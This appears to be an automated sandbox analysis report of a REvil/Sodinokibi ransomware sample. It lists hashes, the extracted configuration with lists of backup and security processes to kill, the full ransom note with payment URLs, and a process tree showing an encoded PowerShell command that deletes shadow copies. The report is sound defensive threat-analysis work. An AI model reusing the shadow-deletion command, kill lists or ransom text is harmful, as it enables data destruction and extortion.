Overview

overview

10

Static

static

10

2024-03-10...il.exe

windows7-x64

10

2024-03-10...il.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    8s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    10-03-2024 09:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-03-10_1b3264683cb611a24adb65249017ea03_revil.exe

  • Size

    123KB

  • MD5

    1b3264683cb611a24adb65249017ea03

  • SHA1

    3f2645e3810bd938646f836f042a2af24c71e255

  • SHA256

    a68e8e2dd24b67cd103191e8d520a81c828de70c2b7818f829151b670b4707ce

  • SHA512

    cda9f3fbe11ee299109e6150803fb7e14bfb16747c128ff484052194791e6be5ddcd8598916aed098160933f3347f5ef72680e53824a61ec0fc5661dc947282d

  • SSDEEP

    1536:7DvcP30ThpshwVs5OE8yNcZQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxg:yrSVhaNcZM8gnBR5uiV1UvQFOxg

Score
10/10
sodinokibi$2a$10$ctl6mpbcozzcr.aru3gxp.pcftg0jof6upmmrky0hc0o.x.alltz.4085persistenceransomware

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr
Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\hyezd5590a-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension hyezd5590a. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08247ED6F9754B0E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/08247ED6F9754B0E Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: +NlJlaFMAnpDTQvb5tfseKTcikJJVPjJAPIS8BeBcuPrl4NlIBP2DiiSVFcsRAaV 7C8Qz5J+f8XhsLCfILxAZAgz9gFnY4Rp/ZQPIykDfxhYI3JgQe+P8bQlGX3AP+fc cEXZl2xTJsS65/JjxI4XxPsgJe/g2lnjGMzS076v1n7toKhK8Be2F9KuqXw6e0Zm T+Z8GFBaY3l0rmcVdW3zcvTYW3K1NUJHp897iwSrfcwi+63zZfRdU17T25uncQKC HIXQLGH9gxN6VI0UK1gLGWm0DNUqOExvR2pacMxAIoeNY8izXC9TXcHu2+BF3Ejd EaQM+bklqAEjdSXny3/OQp/KzHJEtIRPkGZIzyz0OuEfx0YUUdcIJG+WwTATxt+n PWL1wHeZY0nwoIyGOJPh2Sz6O0YpFiU5PlkAMU3SvFl85C6cmrJgyCi4mcUMagOm oAm06/5H2m/a8MqIYjeOk8rGdgc9my1SUH6kf7SEjyf0+HyDrY9XfC04rtlAFQCo +znzae187TQolOb8qx2Sjg8Tp2bxaA4ZZ/iKPgL+lKMN5ayHZj4GXY3uhjHZDXyX D4oHIx7tpXHOgdRvCpZ5T7N/yC4ev+kSb0/AFaLv2dCtK2/PF5SCXJMpLpH/w4c6 g1C8A6aQtU4KM4nkIY+jw10CRncHf1axiIvTGrpGG85zaKP4UVPSmnJwq7tpWySc 8WyiCtGGprQ2YEfPfozwXWIpbJZeflQB0TZ0hJDMJJVnMZjhFZAN6At/SoU2MWo8 CKA4Zu1tT7EOrp9SfZruI1itVGfTZ8HvFX/1CjvSHTKv9NiWerYVzv5Gm6SG/gFw aKv+ZjHogLroEv0FPZqoCiNMxyJCXmm3S0WGPl/HZRmXfQ5+enyLwzs1H2j4nfYs XxAWvbCQlKyx8t45MOnCbjfFydQdgIP6CwiCXBQMJFDqNtOwHelMLEYMubA/ZZvb tRFZorEM3K9zE9Ye2H22IUgfwbsaGdcpq9/Obha0jqaO0NyqdRoqoRLEkjQEFb6H jf4JJCsvCE9Hu6vVHJmTzSuZiTKnAvaNNIu9Qh65Xuvu/6yU6lQsrGJuZWUbNjCE r4gfsWnIinLVXW9LOUEtskMTnqd+Q4Kqw4GKG28nwkPb2B13r86LF/llsSlXj12o 3l9HqW19qC4JZAHRM8vOM/XjKAK8hIjh+/HhjNfQpM6k5jTav7OxwSyHVl9YFwJI 2v9B3zAyZARsLG0nAa4CSSNp/nN/zUfituoiqjt48kuY4JuCWCiEWLeki/e7w4Gy i5zYZdEnL9LH9rk8bo4QUD2oiptMJ613VhIwak8nJ4cLyeSzcH2I6w3zNKIBIiPD iaPMirQq7VaumNQsaQi8S8jVHyY6xbAkh/YHnp/YmuZLNtD5DDC2sg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/08247ED6F9754B0E

http://decryptor.cc/08247ED6F9754B0E

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-10_1b3264683cb611a24adb65249017ea03_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-10_1b3264683cb611a24adb65249017ea03_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3056
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2116
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1728

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab5BA9.tmp
      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar5CF8.tmp
      Filesize

      142KB

      MD5

      4db52e102b486727bc69386f88209a35

      SHA1

      cea5053dc66658cc824875cc915db88a0cbd6fb3

      SHA256

      7d0959377e7bd4243bef12563b3eb6e4e318d16e67e75062de13a0379051fa37

      SHA512

      49b2cb503c091ca28b6fdff9acc3cd0255cc7b5d72a70e77cc7a43a2b161a63feb444ca15b25882a08c20fdec95ee2ebb4a34c38c81bdf17d5e899b943faf07a

      Download Submit

    • C:\Users\hyezd5590a-readme.txt
      Filesize

      6KB

      MD5

      71c196c19fd6d9e22765aef14766f65a

      SHA1

      48496d2f657b20c3ad839fc9cf8de0342071ea0a

      SHA256

      d656bee7838c3e512c441e9053eca7a697fc77359d514f76ba3d774c561500aa

      SHA512

      6cc8d70a3015e121e719f6cc011d66c433a2d4995ac200b97866d49cf22124801e2549b95cb8c531a0ebebc5aa25628b1e424c4e7db5edf352f7bf86500fd9e0

      Download Submit

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      194KB

      MD5

      3db09c12acfad6b28c6b22f67f2d92e5

      SHA1

      7ae69929a0ceb1d6180e263df787e569ce252d41

      SHA256

      0ea5fadf6de10cbb6d61324154792a4c8b6405459f48336f14cd3e8622e15fb0

      SHA512

      560cfde9cd7ea467419a73011e65b21d469f6044dfd51d740b2ae2fc4450bd53b3a33b06705a13344f0cc39d73d04ff31ad3e3fdb1d762de4bf1a6672b0e5eac

      Download Submit

    • memory/2276-18-0x0000000000D00000-0x0000000000D22000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2276-0-0x0000000000D00000-0x0000000000D22000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3056-7-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/3056-12-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/3056-11-0x0000000002B70000-0x0000000002BF0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/3056-10-0x0000000002B70000-0x0000000002BF0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/3056-9-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/3056-8-0x0000000002B70000-0x0000000002BF0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/3056-6-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3056-5-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB

      Download